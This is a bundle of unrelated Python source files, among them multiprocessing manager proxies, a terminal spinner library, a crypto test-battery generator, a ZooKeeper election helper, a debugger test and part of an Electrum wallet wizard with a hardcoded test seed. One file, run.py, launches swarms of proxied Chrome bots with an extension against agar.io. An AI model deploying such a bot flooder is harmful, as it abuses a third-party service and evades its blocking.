def Array(typecode, sequence, lock=True):
return array.array(typecode, sequence)
#
# Proxy types used by SyncManager
#
class IteratorProxy(BaseProxy):
# XXX remove methods for Py3.0 and Py2.6
_exposed_ = ('__next__', 'next', 'send', 'throw', 'close')
def __iter__(self):
return self
def __next__(self, *args):
return self._callmethod('__next__', args)
def next(self, *args):
return self._callmethod('next', args)
def send(self, *args):
return self._callmethod('send', args)
def throw(self, *args):
return self._callmethod('throw', args)
def close(self, *args):
return self._callmethod('close', args)
class AcquirerProxy(BaseProxy):
_exposed_ = ('acquire', 'release')
def acquire(self, blocking=True):
return self._callmethod('acquire', (blocking,))
def release(self):
return self._callmethod('release')
def __enter__(self):
return self._callmethod('acquire')
def __exit__(self, exc_type, exc_val, exc_tb):
return self._callmethod('release')
class ConditionProxy(AcquirerProxy):
# XXX will Condition.notfyAll() name be available in Py3.0?
_exposed_ = ('acquire', 'release', 'wait', 'notify', 'notify_all')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def notify(self):
return self._callmethod('notify')
def notify_all(self):
return self._callmethod('notify_all')
class EventProxy(BaseProxy):
_exposed_ = ('is_set', 'set', 'clear', 'wait')
def is_set(self):
return self._callmethod('is_set')
def set(self):
return self._callmethod('set')
def clear(self):
return self._callmethod('clear')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
class NamespaceProxy(BaseProxy):
_exposed_ = ('__getattribute__', '__setattr__', '__delattr__')
def __getattr__(self, key):
if key[0] == '_':
return object.__getattribute__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__getattribute__', (key,))
def __setattr__(self, key, value):
if key[0] == '_':
return object.__setattr__(self, key, value)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__setattr__', (key, value))
def __delattr__(self, key):
if key[0] == '_':
return object.__delattr__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__delattr__', (key,))
class ValueProxy(BaseProxy):
_exposed_ = ('get', 'set')
def get(self):
return self._callmethod('get')
def set(self, value):
return self._callmethod('set', (value,))
value = property(get, set)
BaseListProxy = MakeProxyType('BaseListProxy', (
'__add__', '__contains__', '__delitem__', '__delslice__',
'__getitem__', '__getslice__', '__len__', '__mul__',
'__reversed__', '__rmul__', '__setitem__', '__setslice__',
'append', 'count', 'extend', 'index', 'insert', 'pop', 'remove',
'reverse', 'sort', '__imul__'
)) # XXX __getslice__ and __setslice__ unneeded in Py3.0
class ListProxy(BaseListProxy):
def __iadd__(self, value):
self._callmethod('extend', (value,))
return self
def __imul__(self, value):
self._callmethod('__imul__', (value,))
return self
DictProxy = MakeProxyType('DictProxy', (
'__contains__', '__delitem__', '__getitem__', '__iter__', '__len__',
'__setitem__', 'clear', 'copy', 'get', 'has_key', 'items',
'keys', 'pop', 'popitem', 'setdefault', 'update', 'values'
))
DictProxy._method_to_typeid_ = {
'__iter__': 'Iterator',
}
ArrayProxy = MakeProxyType('ArrayProxy', (
'__len__', '__getitem__', '__setitem__', '__getslice__', '__setslice__'
)) # XXX __getslice__ and __setslice__ unneeded in Py3.0
PoolProxy = MakeProxyType('PoolProxy', (
'apply', 'apply_async', 'close', 'imap', 'imap_unordered', 'join',
'map', 'map_async', 'terminate'
))
PoolProxy._method_to_typeid_ = {
'apply_async': 'AsyncResult',
'map_async': 'AsyncResult',
'imap': 'Iterator',
'imap_unordered': 'Iterator'
}
#
# Definition of SyncManager
#
class SyncManager(BaseManager):
'''
Subclass of `BaseManager` which supports a number of shared object types.
The types registered are those intended for the synchronization
of threads, plus `dict`, `list` and `Namespace`.
The `multiprocessing.Manager()` function creates started instances of
this class.
'''
SyncManager.register('Queue', Queue.Queue)
SyncManager.register('JoinableQueue', Queue.Queue)
SyncManager.register('Event', threading.Event, EventProxy)
SyncManager.register('Lock', threading.Lock, AcquirerProxy)
SyncManager.register('RLock', threading.RLock, AcquirerProxy)
SyncManager.register('Semaphore', threading.Semaphore, AcquirerProxy)
SyncManager.register('BoundedSemaphore', threading.BoundedSemaphore,
AcquirerProxy)
SyncManager.register('Condition', threading.Condition, ConditionProxy)
SyncManager.register('Pool', Pool, PoolProxy)
SyncManager.register('list', list, ListProxy)
SyncManager.register('dict', dict, DictProxy)
SyncManager.register('Value', Value, ValueProxy)
SyncManager.register('Array', Array, ArrayProxy)
SyncManager.register('Namespace', Namespace, NamespaceProxy)
# types returned by methods of PoolProxy
SyncManager.register('Iterator', proxytype=IteratorProxy, create_method=False)
SyncManager.register('AsyncResult', create_method=False)
|
halo.py
|
# -*- coding: utf-8 -*-
# pylint: disable=unsubscriptable-object
"""Beautiful terminal spinners in Python.
"""
from __future__ import absolute_import, unicode_literals
import atexit
import functools
import sys
import threading
import time
import cursor
from log_symbols.symbols import LogSymbols
from spinners.spinners import Spinners
from halo._utils import (colored_frame, decode_utf_8_text, get_environment,
get_terminal_columns, is_supported, is_text_type,
encode_utf_8_text)
class Halo(object):
"""Halo library.
Attributes
----------
CLEAR_LINE : str
Code to clear the line
"""
CLEAR_LINE = '\033[K'
SPINNER_PLACEMENTS = ('left', 'right',)
def __init__(self, text='', color='cyan', text_color=None, spinner=None,
animation=None, placement='left', interval=-1, enabled=True, stream=sys.stdout):
"""Constructs the Halo object.
Parameters
----------
text : str, optional
Text to display.
text_color : str, optional
Color of the text.
color : str, optional
Color of the text to display.
spinner : str|dict, optional
String or dictionary representing spinner. String can be one of 60+ spinners
supported.
animation: str, optional
Animation to apply if text is too large. Can be one of `bounce`, `marquee`.
Defaults to ellipses.
placement: str, optional
Side of the text to place the spinner on. Can be `left` or `right`.
Defaults to `left`.
interval : integer, optional
Interval between each frame of the spinner in milliseconds.
enabled : boolean, optional
Spinner enabled or not.
stream : io, optional
Output.
"""
self._color = color
self._animation = animation
self.spinner = spinner
self.text = text
self._text_color = text_color
self._interval = int(interval) if int(interval) > 0 else self._spinner['interval']
self._stream = stream
self.placement = placement
self._frame_index = 0
self._text_index = 0
self._spinner_thread = None
self._stop_spinner = None
self._spinner_id = None
self.enabled = enabled
environment = get_environment()
def clean_up():
"""Handle cell execution"""
self.stop()
if environment in ('ipython', 'jupyter'):
from IPython import get_ipython
ip = get_ipython()
ip.events.register('post_run_cell', clean_up)
else: # default terminal
atexit.register(clean_up)
def __enter__(self):
"""Starts the spinner on a separate thread. For use in context managers.
Returns
-------
self
"""
return self.start()
def __exit__(self, type, value, traceback):
"""Stops the spinner. For use in context managers."""
self.stop()
def __call__(self, f):
"""Allow the Halo object to be used as a regular function decorator."""
@functools.wraps(f)
def wrapped(*args, **kwargs):
with self:
return f(*args, **kwargs)
return wrapped
@property
def spinner(self):
"""Getter for spinner property.
Returns
-------
dict
spinner value
"""
return self._spinner
@spinner.setter
def spinner(self, spinner=None):
"""Setter for spinner property.
Parameters
----------
spinner : dict, str
Defines the spinner value with frame and interval
"""
self._spinner = self._get_spinner(spinner)
self._frame_index = 0
self._text_index = 0
@property
def text(self):
"""Getter for text property.
Returns
-------
str
text value
"""
return self._text['original']
@text.setter
def text(self, text):
"""Setter for text property.
Parameters
----------
text : str
Defines the text value for spinner
"""
self._text = self._get_text(text)
@property
def text_color(self):
"""Getter for text color property.
Returns
-------
str
text color value
"""
return self._text_color
@text_color.setter
def text_color(self, text_color):
"""Setter for text color property.
Parameters
----------
text_color : str
Defines the text color value for spinner
"""
self._text_color = text_color
@property
def color(self):
"""Getter for color property.
Returns
-------
str
color value
"""
return self._color
@color.setter
def color(self, color):
"""Setter for color property.
Parameters
----------
color : str
Defines the color value for spinner
"""
self._color = color
@property
def placement(self):
"""Getter for placement property.
Returns
-------
str
spinner placement
"""
return self._placement
@placement.setter
def placement(self, placement):
"""Setter for placement property.
Parameters
----------
placement: str
Defines the placement of the spinner
"""
if placement not in self.SPINNER_PLACEMENTS:
raise ValueError(
"Unknown spinner placement '{0}', available are {1}".format(placement, self.SPINNER_PLACEMENTS))
self._placement = placement
@property
def spinner_id(self):
"""Getter for spinner id
Returns
-------
str
Spinner id value
"""
return self._spinner_id
@property
def animation(self):
"""Getter for animation property.
Returns
-------
str
Spinner animation
"""
return self._animation
@animation.setter
def animation(self, animation):
"""Setter for animation property.
Parameters
----------
animation: str
Defines the animation of the spinner
"""
self._animation = animation
self._text = self._get_text(self._text['original'])
def _check_stream(self):
"""Returns whether the stream is open, and if applicable, writable
Returns
-------
bool
Whether the stream is open
"""
if self._stream.closed:
return False
try:
# Attribute access kept separate from invocation, to avoid
# swallowing AttributeErrors from the call which should bubble up.
check_stream_writable = self._stream.writable
except AttributeError:
pass
else:
return check_stream_writable()
return True
def _write(self, s):
"""Write to the stream, if writable
Parameters
----------
s : str
Characters to write to the stream
"""
if self._check_stream():
self._stream.write(s)
def _hide_cursor(self):
"""Disable the user's blinking cursor
"""
if self._check_stream() and self._stream.isatty():
cursor.hide(stream=self._stream)
def _show_cursor(self):
"""Re-enable the user's blinking cursor
"""
if self._check_stream() and self._stream.isatty():
cursor.show(stream=self._stream)
def _get_spinner(self, spinner):
"""Extracts spinner value from options and returns value
containing spinner frames and interval, defaults to 'dots' spinner.
Parameters
----------
spinner : dict, str
Contains spinner value or type of spinner to be used
Returns
-------
dict
Contains frames and interval defining spinner
"""
default_spinner = Spinners['dots'].value
if spinner and type(spinner) == dict:
return spinner
if is_supported():
if all([is_text_type(spinner), spinner in Spinners.__members__]):
return Spinners[spinner].value
else:
return default_spinner
else:
return Spinners['line'].value
def _get_text(self, text):
"""Creates frames based on the selected animation
Returns
-------
self
"""
animation = self._animation
stripped_text = text.strip()
# Check which frame of the animation is the widest
max_spinner_length = max([len(i) for i in self._spinner['frames']])
# Subtract to the current terminal size the max spinner length
# (-1 to leave room for the extra space between spinner and text)
terminal_width = get_terminal_columns() - max_spinner_length - 1
text_length = len(stripped_text)
frames = []
if terminal_width < text_length and animation:
if animation == 'bounce':
"""
Make the text bounce back and forth
"""
for x in range(0, text_length - terminal_width + 1):
frames.append(stripped_text[x:terminal_width + x])
frames.extend(list(reversed(frames)))
elif 'marquee':
"""
Make the text scroll like a marquee
"""
stripped_text = stripped_text + ' ' + stripped_text[:terminal_width]
for x in range(0, text_length + 1):
frames.append(stripped_text[x:terminal_width + x])
elif terminal_width < text_length and not animation:
# Add ellipsis if text is larger than terminal width and no animation was specified
frames = [stripped_text[:terminal_width - 6] + ' (...)']
else:
frames = [stripped_text]
return {
'original': text,
'frames': frames
}
def clear(self):
"""Clears the line and returns cursor to the start.
of line
Returns
-------
self
"""
self._write('\r')
self._write(self.CLEAR_LINE)
return self
def _render_frame(self):
"""Renders the frame on the line after clearing it.
"""
if not self.enabled:
# in case we're disabled or stream is closed while still rendering,
# we render the frame and increment the frame index, so the proper
# frame is rendered if we're reenabled or the stream opens again.
return
self.clear()
frame = self.frame()
output = '\r{}'.format(frame)
try:
self._write(output)
except UnicodeEncodeError:
self._write(encode_utf_8_text(output))
def render(self):
"""Runs the render until thread flag is set.
Returns
-------
self
"""
while not self._stop_spinner.is_set():
self._render_frame()
time.sleep(0.001 * self._interval)
return self
def frame(self):
"""Builds and returns the frame to be rendered
Returns
-------
self
"""
frames = self._spinner['frames']
frame = frames[self._frame_index]
if self._color:
frame = colored_frame(frame, self._color)
self._frame_index += 1
self._frame_index = self._frame_index % len(frames)
text_frame = self.text_frame()
return u'{0} {1}'.format(*[
(text_frame, frame)
if self._placement == 'right' else
(frame, text_frame)
][0])
def text_frame(self):
"""Builds and returns the text frame to be rendered
Returns
-------
self
"""
if len(self._text['frames']) == 1:
if self._text_color:
return colored_frame(self._text['frames'][0], self._text_color)
# Return first frame (can't return original text because at this point it might be ellipsed)
return self._text['frames'][0]
frames = self._text['frames']
frame = frames[self._text_index]
self._text_index += 1
self._text_index = self._text_index % len(frames)
if self._text_color:
return colored_frame(frame, self._text_color)
return frame
def start(self, text=None):
"""Starts the spinner on a separate thread.
Parameters
----------
text : None, optional
Text to be used alongside spinner
Returns
-------
self
"""
if text is not None:
self.text = text
if self._spinner_id is not None:
return self
if not (self.enabled and self._check_stream()):
return self
self._hide_cursor()
self._stop_spinner = threading.Event()
self._spinner_thread = threading.Thread(target=self.render)
self._spinner_thread.setDaemon(True)
self._render_frame()
self._spinner_id = self._spinner_thread.name
self._spinner_thread.start()
return self
def stop(self):
"""Stops the spinner and clears the line.
Returns
-------
self
"""
if self._spinner_thread and self._spinner_thread.is_alive():
self._stop_spinner.set()
self._spinner_thread.join()
if self.enabled:
self.clear()
self._frame_index = 0
self._spinner_id = None
self._show_cursor()
return self
def succeed(self, text=None):
"""Shows and persists success symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside success symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.SUCCESS.value, text=text)
def fail(self, text=None):
"""Shows and persists fail symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside fail symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.ERROR.value, text=text)
def warn(self, text=None):
"""Shows and persists warn symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside warn symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.WARNING.value, text=text)
def info(self, text=None):
"""Shows and persists info symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside info symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.INFO.value, text=text)
def stop_and_persist(self, symbol=' ', text=None):
"""Stops the spinner and persists the final frame to be shown.
Parameters
----------
symbol : str, optional
Symbol to be shown in final frame
text: str, optional
Text to be shown in final frame
Returns
-------
self
"""
if not self.enabled:
return self
symbol = decode_utf_8_text(symbol)
if text is not None:
text = decode_utf_8_text(text)
else:
text = self._text['original']
text = text.strip()
if self._text_color:
text = colored_frame(text, self._text_color)
self.stop()
output = u'{0} {1}\n'.format(*[
(text, symbol)
if self._placement == 'right' else
(symbol, text)
][0])
try:
self._stream.write(output)
except UnicodeEncodeError:
self._stream.write(encode_utf_8_text(output))
return self
|
testbatteries.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import shutil
import subprocess
import sys
import threading
import time
import traceback
from queue import Queue, Empty as QEmpty
from booltest import egenerator
from booltest import common
from booltest.booltest_main import *
logger = logging.getLogger(__name__)
coloredlogs.install(level=logging.DEBUG)
# Main - argument parsing + processing
class TestBatteries(Booltest):
"""
TestBatteries submits standard crypto functions to standard testing batteries for analysis.
"""
def __init__(self, *args, **kwargs):
super(TestBatteries, self).__init__(*args, **kwargs)
self.args = None
self.tester = None
self.input_poly = []
self.results_dir = None
self.generator_path = None
self.seed = '1fe40505e131963c'
self.data_to_gen = 0
self.config_js = None
self.cur_data_file = None # (tmpdir, config, file)
self.joq_queue = Queue()
self.res_map = {}
self.res_lock = threading.Lock()
def init_params(self):
"""
Parameter processing
:return:
"""
# Results dir
self.results_dir = self.args.results_dir
if self.results_dir is None:
logger.warning('Results dir is not defined, using current directory')
self.results_dir = os.getcwd()
elif not os.path.exists(self.results_dir):
os.makedirs(self.results_dir)
# Generator path
self.generator_path = self.args.generator_path
if self.generator_path is None:
logger.warning('Generator path is not given, using current directory')
self.generator_path = os.path.join(os.getcwd(), 'generator')
if not os.path.exists(self.generator_path):
raise ValueError('Generator not found: %s' % self.generator_path)
def gen_randomdir(self, function, round):
"""
Generates random directory name
:return:
"""
dirname = 'testbed-%s-r%s-%d-%d' % (function, round, int(time.time()), random.randint(0, 2**32-1))
return os.path.join('/tmp', dirname)
def find_data_file(self, function, round):
"""
Tries to find a data file
:param function:
:param round:
:return:
"""
data_dir = self.args.data_dir
if data_dir is None or not os.path.exists(data_dir):
logger.info('Data dir empty %s' % data_dir)
return None
candidates = [
'%s_r%s_seed%s_%sMB.bin' % (function, round, self.seed, self.data_to_gen//1024//1024),
'%s_r%s_seed%s.bin' % (function, round, self.seed),
'%s_r%s_b8.bin' % (function, round),
'%s_r%s_b16.bin' % (function, round),
'%s_r%s_b32.bin' % (function, round),
'%s_r%s.bin' % (function, round),
'%s.bin' % function
]
for cand in candidates:
fpath = os.path.join(data_dir, cand)
if not os.path.exists(fpath):
continue
if os.path.getsize(fpath) < self.data_to_gen:
logger.info('File %s exists but is too small' % fpath)
continue
return fpath
return None
def data_generator(self, tmpdir, function, cur_round, config_js):
"""
Used to call generator to generate data to test. Prepares data to test.
If the file has already been generated, just returns the generated file.
:return:
"""
data_file = self.find_data_file(function=function, round=cur_round)
if data_file is not None:
logger.info('Data file found cached: %s' % data_file)
return data_file
# Egenerator procedure: new temp folder, generate config, generate data.
logger.info('Generating data for %s, round %s to %s' % (function, cur_round, tmpdir))
data_file = self.eacirc_generator(tmpdir=tmpdir, generator_path=self.generator_path, config_js=config_js)
return data_file
def eacirc_generator(self, tmpdir, generator_path, config_js):
"""
Uses Egenerator to produce the file
:param tmpdir:
:param generator_path:
:param config_js:
:return:
"""
os.makedirs(tmpdir)
new_generator_path = os.path.join(tmpdir, 'generator')
shutil.copy(generator_path, new_generator_path)
config_str = json.dumps(config_js, indent=2)
with open(os.path.join(tmpdir, 'generator.json'), 'w') as fh:
fh.write(config_str)
# Generate some data here
time.sleep(1)
p = subprocess.Popen(new_generator_path, shell=True, cwd=tmpdir)
p.communicate()
if p.returncode != 0:
logger.error('Could not generate data, genpath: %s, cwd: %s, code: %s'
% (new_generator_path, tmpdir, p.returncode))
return None
# Generated file:
data_files = [f for f in os.listdir(tmpdir) if os.path.isfile(os.path.join(tmpdir, f))
and f.endswith('bin')]
if len(data_files) != 1:
logger.error('Error in generating data to process. Files found: %s' % data_files)
return None
data_file = os.path.join(tmpdir, data_files[0])
return data_file
def clean_temp_dir(self, tmpdir):
"""
Cleans artifacts
:param tmpdir:
:return:
"""
if os.path.exists(tmpdir):
shutil.rmtree(tmpdir, ignore_errors=True)
def is_function_egen(self, function):
"""
Returns true if function is generated by EAcirc generator
:param function:
:return:
"""
return function in egenerator.ROUNDS or function in egenerator.SHA3 or function in egenerator.ESTREAM
def get_test_battery(self):
"""
Returns function -> [r1, r2, r3, ...] to test on given number of rounds.
:return:
"""
battery = collections.OrderedDict()
battery['AES'] = [3]
battery['ARIRANG'] = [3]
battery['AURORA'] = [2]
battery['BLAKE'] = [1]
battery['Cheetah'] = [4]
battery['CubeHash'] = [0]
battery['DCH'] = [1]
battery['DECIM'] = [5]
battery['DynamicSHA2'] = [14]
battery['ECHO'] = [1]
battery['Grain'] = [2]
battery['Grostl'] = [2]
battery['Hamsi'] = [0]
battery['JH'] = [6]
battery['Keccak'] = [3]
battery['LEX'] = [3]
battery['Lesamnta'] = [2]
battery['Luffa'] = [7]
battery['MD6'] = [9]
battery['SIMD'] = [0]
battery['Salsa20'] = [4]
battery['TEA'] = [4]
battery['TSC-4'] = [14]
battery['Tangle'] = [25]
battery['Twister'] = [6]
# Another tested functions, not (yet) included in egen.
battery['MD5'] = [15, 16, 17]
battery['SHA256'] = [3, 4]
battery['RC4'] = [1]
battery['RC4_Col'] = [1]
# PRNGs
battery['crand_aisa'] = [1]
battery['javarand'] = [1]
return battery
def worker_main(self, idx):
"""
Data gen worker method
:return:
"""
logger.info('Starting worker %d' % idx)
while True:
job = None
function, cur_round = None, None
try:
job = self.joq_queue.get_nowait()
function, cur_round = job
except QEmpty:
break
try:
tmpdir = self.gen_randomdir(function, cur_round)
if self.is_function_egen(function):
config_js = egenerator.get_config(function_name=function, rounds=cur_round, data=self.data_to_gen)
else:
config_js = {'algorithm': function, 'round': cur_round, 'seed': self.seed}
logger.info('Generating %s:%s' % (function, cur_round))
data_file = self.data_generator(tmpdir=tmpdir, function=function, cur_round=cur_round,
config_js=config_js)
if data_file is None:
logger.error('Data file is invalid')
continue
new_data_file = os.path.join(self.args.results_dir, os.path.basename(data_file))
if not os.path.exists(new_data_file) or not os.path.samefile(data_file, new_data_file):
logger.info("Copying to %s" % new_data_file)
shutil.copy(data_file, new_data_file)
cfgname = 'config_%s_r%d_%04dMB' % (function, cur_round, self.data_to_gen//1024//1024)
with open(os.path.join(self.args.results_dir, cfgname), 'w') as fh:
fh.write(json.dumps(config_js, indent=2))
with self.res_lock:
self.res_map[(function, cur_round)] = (data_file, cfgname, config_js)
logger.info('Generated %s:%s' % (function, cur_round))
# Remove test dir
self.clean_temp_dir(tmpdir)
except Exception as e:
logger.error('Exception when computing %s:%s : %s' % (function, cur_round, e))
logger.debug(traceback.format_exc())
sys.exit(1)
finally:
# Job finished
self.joq_queue.task_done()
logger.info('Terminating worker %d' % idx)
# noinspection PyBroadException
def work(self):
"""
Main entry point - data processing
:return:
"""
self.init_params()
# Init logic, analysis.
# Define test set.
test_sizes_mb = self.args.matrix_size
battery = self.get_test_battery()
functions = sorted(list(battery.keys()))
self.data_to_gen = max(test_sizes_mb) * 1024 * 1024
logger.info('Battery of functions to test: %s' % battery)
logger.info('Sizes to test: %s' % test_sizes_mb)
# Pre-allocate job queue
for function in functions:
for cur_round in battery[function]:
self.joq_queue.put((function, cur_round))
workers = []
for wrk in range(self.args.threads):
logger.info('manager: starting worker %d' % wrk)
t = threading.Thread(target=self.worker_main, args=(wrk, ))
t.setDaemon(True)
t.start()
workers.append(t)
# Wait until all datasets are generated
logger.info('The whole dataset generated')
self.joq_queue.join()
# Generate bash script to submit experiments
bash = '#!/bin/bash\n'
for function in functions:
for cur_round in battery[function]:
for cur_size in self.args.matrix_size:
data_file, cfgname, config_js = self.res_map[(function, cur_round)]
test_name = '%s_r%d_%04dMB' % (function, cur_round, cur_size)
test_file = os.path.join(self.args.script_data, os.path.basename(data_file))
line = 'submit_experiment -e %s -n "%s" -c "/home/sample-configs/%dMB.json" -f "%s" -a\n' \
% (self.args.email, test_name, cur_size, test_file)
bash += line
bash_path = os.path.join(self.args.results_dir, 'submit.sh')
with open(bash_path, 'w') as fh:
fh.write(bash)
logger.info('Finished')
def main(self):
logger.debug('App started')
parser = argparse.ArgumentParser(description='Test with batteries')
parser.add_argument('--debug', dest='debug', action='store_const', const=True,
help='enables debug mode')
parser.add_argument('--verbose', dest='verbose', action='store_const', const=True,
help='enables verbose mode')
#
# Testbed related options
#
parser.add_argument('--threads', dest='threads', default=1, type=int,
help='Number of threads to gen data')
parser.add_argument('--email', dest='email', default=None,
help='Email to sends results to')
parser.add_argument('--generator-path', dest='generator_path', default=None,
help='Path to the eacirc generator executable')
parser.add_argument('--result-dir', dest='results_dir', default=None,
help='Directory to put results to')
parser.add_argument('--data-dir', dest='data_dir', default=None,
help='Directory to load data from (precomputed samples to test)')
parser.add_argument('--script-data', dest='script_data', default=None,
help='Directory to load data from - in the benchmark script')
#
# Testing matrix definition
#
parser.add_argument('--matrix-size', dest='matrix_size', nargs=argparse.ZERO_OR_MORE,
default=[1, 10, 100, 1000], type=int,
help='List of data sizes to test in MB')
self.args = parser.parse_args()
if self.args.debug:
coloredlogs.install(level=logging.DEBUG)
self.work()
# Launcher
app = None
if __name__ == "__main__":
app = TestBatteries()
app.main()
|
election.py
|
from __future__ import absolute_import, print_function
from kazoo.client import KazooClient
import os.path
import threading
from . import log
from . import state
ELECTION_PATH = '/dispatch/election'
class MasterElection(object):
def __init__(self):
self.zk = KazooClient(hosts=state.ARGS.zookeeper)
self.master_notified = False
self.my_node = None
self.zk.start() # Stop never called
self.zk.ensure_path(ELECTION_PATH)
def start_election(self, master_callback):
"""
Start the master election.
If this node is the master, the callback will be called once.
:params master_callback: Called if this node is the master
"""
self.callback = master_callback
self.my_node = self.zk.create(ELECTION_PATH + '/n_',
ephemeral=True, sequence=True)
self.zk.get_children(ELECTION_PATH, watch=self._election_update)
self._election_update()
def _election_update(self, data=None):
def worker():
try:
self.master_notified = True
self.callback()
except Exception as e:
self.master_notified = False
log.info("Failed to activate master, redoing election: %r", e)
self.zk.delete(self.my_node)
self.my_node = self.zk.create(ELECTION_PATH + '/n_',
ephemeral=True, sequence=True)
self._election_update()
if not self.master_notified and \
sorted(self.zk.get_children(ELECTION_PATH))[0] == \
os.path.basename(self.my_node):
t = threading.Thread(target=worker)
t.daemon = True
t.start()
|
_debugger_case_get_thread_stack.py
|
import threading
event_set = False
inner_started = False
def method():
global inner_started
inner_started = True
while not event_set:
import time
time.sleep(.1)
t = threading.Thread(target=method)
t.start()
while not inner_started:
import time
time.sleep(.1)
print('break here')
event_set = True
t.join()
print('TEST SUCEEDED!')
|
run.py
|
with open("./proxies") as f:
proxies = f.readlines()
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import os
import time
import os
import random
import threading
mem_gib = int(input("How many bots do you want to spawn? (too many will crash your pc/vps): "))
print "\nOkay good, now check the nodejs console; You should see 'Browser Connected UUID: XSAGHASGga' If this doesnt show two things could of happened, There patched OR You need to update your proxies :)"
def bot():
try:
chromedriver = "chromedriver"
os.environ["webdriver.chrome.driver"] = chromedriver
options = Options()
options.add_extension('loader.crx')
options.add_argument('--proxy-server='+random.choice(proxies))
driver = webdriver.Chrome(chrome_options=options)
driver.set_window_size(1, 1)
driver.get("http://agar.io")
#time.sleep(30) #slow proxies
except:
bot()
print "Opening browsers"
for a in range(mem_gib / 2):
t = threading.Thread(target=bot)
t.start()
time.sleep(0.2)
print "Waiting at least 30 seconds for all the proxies to load"
time.sleep(30)
print "Assuming some of the proxies managed to connect, if you don't see 'Browser Connected UUID: GDSAeageAEag' at least a few times on the nodejs console you should update your proxies :)"
while(1):
time.sleep(30)
|
installwizard.py
|
from functools import partial
import threading
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.utils import platform
from kivy.uix.widget import Widget
from kivy.core.window import Window
from kivy.clock import Clock
from kivy.utils import platform
from electrum.base_wizard import BaseWizard
from . import EventsDialog
from ...i18n import _
from .password_dialog import PasswordDialog
# global Variables
is_test = (platform == "linux")
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum_gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: .854, .925, .984, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: 0, 0, 0, .9
Rectangle:
size: Window.size
Color:
rgba: .239, .588, .882, 1
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'ELECTRUM XRJV1'
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From {} cosigners').format(n.value)
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require {} signatures').format(m.value)
Slider:
id: m
range: 1, n.value
step: 1
value: 2
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<RestoreSeedDialog>
message: ''
word: ''
BigLabel:
text: "ENTER YOUR SEED PHRASE"
GridLayout
